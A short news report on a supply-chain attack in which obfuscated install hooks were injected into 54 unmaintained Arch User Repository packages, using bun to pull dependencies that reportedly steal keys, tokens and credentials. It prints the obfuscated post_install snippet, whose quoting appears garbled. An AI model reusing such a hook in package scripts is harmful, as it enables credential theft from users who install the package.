Malicious code was injected into an additional 54 packages in AUR.

Despite the measures taken by Arch Linux developers, the activity of injecting malicious code into the AUR (Arch User Repository) has not stopped. A few hours ago, malicious code was injected into another 54 packages that lacked maintainers (the history of rollback from malicious edits). Unlike the attacks from the day before yesterday, this time the bun platform was used instead of the npm package manager for installing malicious dependencies. To bypass the implemented filters, an obfuscated string is inserted into the post_install function, which calls the command "bun add" to install packages with malicious code that scans and sends out server keys, tokens, and credentials.

post_install() {
$'\x63'"d" "\/"‘t'"m"‘p’ && "b"‘u"n' 'a'"d"‘d’ $'\141\x6e's'"i"'-"$'\143'o'l'o"r'$'\x73' 'n'"e"‘x'"t"»f'‘i'"l"e"-j"s'
}

Source: opennet.ru

Buy reliable website hosting with DDoS protection, VPS VDS servers 🔥 Buy reliable website hosting with DDoS protection, VPS VDS servers | ProHoster